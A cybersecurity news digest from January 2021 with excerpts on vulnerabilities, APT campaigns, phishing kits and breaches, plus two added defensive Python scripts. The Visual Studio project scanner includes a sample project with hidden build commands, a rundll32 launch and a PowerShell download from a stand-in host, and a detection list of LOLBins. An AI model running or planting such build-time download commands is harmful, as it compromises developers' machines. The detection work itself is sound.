OSN JANUARY 29, 2021

Fortify Security Team
Jan 29, 2021

Title: Windows Installer Zero-Day Vulnerability Gets Free Micropatch
Date Published: January 29, 2021


Excerpt: “A vulnerability in the Windows Installer component, which Microsoft attempted to fix several times to no avail, today received a micropatch to deny hackers the option of gaining the highest privileges on a compromised system. The issue affects Windows 7 through 10. Microsoft’s most recent effort to address the issue (CVE-2020-16902) was in October. A bypass, complete with proof-of-concept (PoC) exploit code emerged in late December 2020.”

Title: “Serious” Vulnerability Found in Libgcrypt, GnuPG’s Cryptographic Library
Date Published: January 29, 2021


Excerpt: “It was discovered and flagged by Google Project Zero researcher Tavis Ormandy and affects only Libgcrypt v1.9.0. “Exploiting this bug is simple and thus immediate action for 1.9.0 users is required,” Koch noted. “The 1.9.0 tarballs on our FTP server have been renamed so that scripts won’t be able to get this version anymore.” Version 1.9.1, which fixes the flaw, is available for download.”

Title: Trickbot Is Back Again – With Fresh Phishing and Malware Attacks
Date Published: January 29, 2021


Excerpt: “In October last year, a takedown led by Microsoft disrupted the infrastructure behind the Trickbot malware botnet, but now it appears to be coming back to life as researchers at Menlo Security have identified an ongoing malware campaign which has the hallmarks of previous Trickbot activity. These attacks appear to be exclusively targeting legal and insurance companies in North America, with phishing emails encouraging potential victims to click on a link which will redirect them to a server which downloads a malicious payload.”

Title: Lebanese Cedar APT Group Broke Into Telcos and ISPs Worldwide
Date Published: January 28, 2021


Excerpt: “Based on a modified JSP file browser with a unique string that the adversary used to deploy ‘Explosive RAT’ into the victims’ network, we found some 250 servers that were apparently breached by Lebanese Cedar,” reads the report published by ClearSky. “We assess that there are many more companies that have been hacked and that valuable information was stolen from these companies over periods of months and years.”

Title: Lazarus Affiliate ‘ZINC’ Blamed for Campaign Against Security Researcher
Date Published: January 29, 2021


Excerpt: “Microsoft has attributed a recently discovered campaign to target security researchers with custom malware through elaborate socially-engineered attacks to an APT group affiliated with North Korea-linked Lazarus Group. Google’s Threat Analysis Group (TAG) on Monday already sounded a warning about the attacks, which play the long game and leverage social media to set up trust relationships with researchers and then infect their systems with malware through either malicious web pages or collaborative Visual Studio projects. The attackers appear so far only to be targeting researchers using Windows machines.”
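A shared Visual Studio project can run commands on the machine that builds it, which is one way a "collaborative" project becomes an infection vector. The scanner below is an added example, not code from the article, Microsoft or Google TAG, and it assumes the standard MSBuild execution points (PreBuildEvent, PreLinkEvent, PostBuildEvent commands and `<Exec>` tasks inside a `<Target>`); the excerpt above does not say which mechanism the attackers used. The sample project and the marker list are constructed for the demonstration.

```python
"""Scan an MSBuild/.vcxproj project for shell commands that run during a build.

Added example, not code from the original article, Microsoft or Google TAG.
Assumes the project uses ordinary MSBuild build events or <Exec> tasks to run
code; the page does not state which mechanism the ZINC projects used.
"""
import xml.etree.ElementTree as ET

# Elements whose <Command> child is executed by the C++ build targets.
EVENT_TAGS = ("PreBuildEvent", "PreLinkEvent", "PostBuildEvent")

# Hypothetical triage list: LOLBins and download indicators worth a second look.
SUSPICIOUS = ("rundll32", "powershell", "regsvr32", "mshta", "certutil",
              "cmd /c", "wscript", "cscript", "http://", "https://")

# Constructed sample project: one benign build event and two that run tooling.
SAMPLE_VCXPROJ = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <PreBuildEvent>
      <Command>echo building $(ProjectName)</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>cmd /c rundll32.exe $(ProjectDir)helper.dll,Start</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="Stage" BeforeTargets="Build">
    <Exec Command="powershell -nop -w hidden -c &quot;iwr https://example.invalid/x -o x.dll&quot;" />
  </Target>
</Project>
"""


def _local(tag):
    """Strip the {namespace} prefix ElementTree attaches to qualified tags."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(vcxproj_xml):
    """Return (location, command) pairs for every command a build would run."""
    root = ET.fromstring(vcxproj_xml)
    found = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in EVENT_TAGS:
            for child in elem:
                if _local(child.tag) == "Command" and (child.text or "").strip():
                    found.append((name, child.text.strip()))
        elif name == "Exec" and elem.get("Command"):
            found.append(("Exec", elem.get("Command")))
    return found


def flag_suspicious(commands, markers=SUSPICIOUS):
    """Keep only commands that mention a marker from the triage list."""
    return [(where, cmd) for where, cmd in commands
            if any(m in cmd.lower() for m in markers)]


def scan_file(path):
    """Scan a project file on disk before opening it in Visual Studio."""
    with open(path, encoding="utf-8-sig") as fh:
        return flag_suspicious(find_build_commands(fh.read()))


if __name__ == "__main__":
    for where, cmd in flag_suspicious(find_build_commands(SAMPLE_VCXPROJ)):
        print(f"[{where}] {cmd}")
```

Run `scan_file()` over every `*.vcxproj`, `*.csproj` and `*.props` in a project you received from a stranger before building it; a clean project yields an empty list, and anything returned deserves manual review, since the build runs the command with your user's privileges.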

Title: Breach Data Highlights a Pivot to Orgs Over Individuals
Date Published: January 28, 2021


Excerpt: “Both the number of data breaches and the number of individuals affected by data breaches plummeted in 2020, as attackers moved away from collecting mass amounts of information and instead targeted user credentials as a way to infiltrate corporate networks to install ransomware. That’s according to a new report, out Jan. 28 from the Identity Theft Resource Center, which estimates that more than 300 million individuals were affected by data breaches in 2020, a large number but a drop of 66% over the previous year. In addition, the number of reported data breaches fell to 1,108, a decline of 19% over 2019.”

Title: LogoKit Can Manipulate Phishing Pages in Real Time
Date Published: January 29, 2021


Excerpt: “A recently uncovered phishing kit, named LogoKit, eliminates headaches for cybercriminals via automatically pulling victims’ organization logos onto the phishing login page. This gives assailants the tools expected to effectively emulate organization login pages, a task that can now and again be intricate. Cybercriminals have depended on LogoKit to dispatch phishing assaults on in excess of 700 unique domains in the course of 30 days (including 300 in the past week). The targeted services range from generic login portals to bogus SharePoint, Adobe Document Cloud, OneDrive, Office 365, and cryptocurrency exchange login portals.”

Title: Google Bans Another Misbehaving CA From Chrome
Date Published: January 29, 2021


Excerpt: “Google intends to ban and remove support from Chrome for digital certificates issued by Spanish certificate authority (CA) Camerfirma, the browser maker announced this week. The ban will come into effect with the launch of Chrome 90, scheduled for release in mid-April 2021. After the Chrome 90 launch, all websites that use TLS certificates issued by Camerfirma to secure their HTTPS traffic will show an error and will not load in Chrome going forward.”
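The practical question for an operator is which of their own endpoints will start failing in Chrome 90. The check below is an added example, not code from Google or the article: it fetches a server's leaf certificate with the standard library and flags it when the issuer's organization or common name mentions a CA on a distrust list. It assumes Camerfirma's public issuing CAs carry the name "Camerfirma" in those fields (verify against the actual chain) and inspects only the leaf that `SSLSocket.getpeercert()` exposes, not the full chain. The sample certificate dictionary is constructed to mirror `getpeercert()`'s return shape and is not a real certificate.

```python
"""Flag TLS endpoints whose certificate was issued under a soon-to-be-distrusted CA.

Added example, not code from Google or the article. Assumes the distrusted CA's
name appears in the issuer's organizationName or commonName, and checks only
the leaf certificate returned by ssl's getpeercert().
"""
import socket
import ssl

# Extend as further CAs are removed from browser root programs.
DISTRUSTED_CA_SUBSTRINGS = ("camerfirma",)


def issuer_fields(cert):
    """Flatten the 'issuer' RDN sequence from getpeercert() into a dict."""
    fields = {}
    for rdn in cert.get("issuer", ()):
        for key, value in rdn:
            fields[key] = value
    return fields


def issued_by_distrusted_ca(cert, distrusted=DISTRUSTED_CA_SUBSTRINGS):
    """True if the issuer's O or CN mentions a CA on the distrust list."""
    fields = issuer_fields(cert)
    haystack = " ".join(
        fields.get(k, "") for k in ("organizationName", "commonName")
    ).lower()
    return any(name in haystack for name in distrusted)


def check_host(host, port=443, timeout=5.0):
    """Connect, fetch the leaf certificate and return (flagged, issuer fields).

    Needs network access; the offline checks below use SAMPLE_CERT instead.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    return issued_by_distrusted_ca(cert), issuer_fields(cert)


# Constructed sample in the shape getpeercert() returns; not a real certificate.
SAMPLE_CERT = {
    "subject": ((("commonName", "www.example.invalid"),),),
    "issuer": (
        (("countryName", "ES"),),
        (("organizationName", "AC Camerfirma S.A."),),
        (("commonName", "Camerfirma Example Issuing CA"),),
    ),
    "notAfter": "Jan  1 00:00:00 2022 GMT",
}


if __name__ == "__main__":
    print("sample flagged:", issued_by_distrusted_ca(SAMPLE_CERT))
    # Inventory run (network required): iterate over your own hostnames.
    # for host in ("intranet.example.invalid",):
    #     print(host, check_host(host))
```

Feed `check_host()` the hostnames from your certificate inventory; any endpoint it flags needs a certificate from a CA that Chrome still trusts before the Chrome 90 release, because the remaining validity of the Camerfirma certificate will not matter once the distrust takes effect.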

Title: Reported US Data Breaches Declined by 19% in 2020
Date Published: January 29, 2021


Excerpt: “In the U.S., reported data breaches and inadvertent data exposure incidents decreased by 19% from 1,473 in 2019 to 1,108 in 2020, as did the overall number of exposed records, according to the Identity Theft Resource Center, a nonprofit organization based in San Diego, California, that provides no-cost assistance to U.S. identity theft victims to help resolve their cases. The ITRC recently released its 15th annual Data Breach Report.”

Title: USCellular hit by a data breach after hackers access CRM software
Date Published: January 28, 2021


Excerpt: “On January 6, 2021, we detected a data security incident in which unauthorized individuals may have gained access to your wireless customer account and wireless phone number. A few employees in retail stores were successfully scammed by unauthorized individuals and downloaded software onto a store computer.” “Since the employee was already logged into the customer retail management (“CRM”) system, the downloaded software allowed the unauthorized individual to remotely access the store computer and enter the CRM system under the employee’s credentials,” states the USCellular data breach notification.”
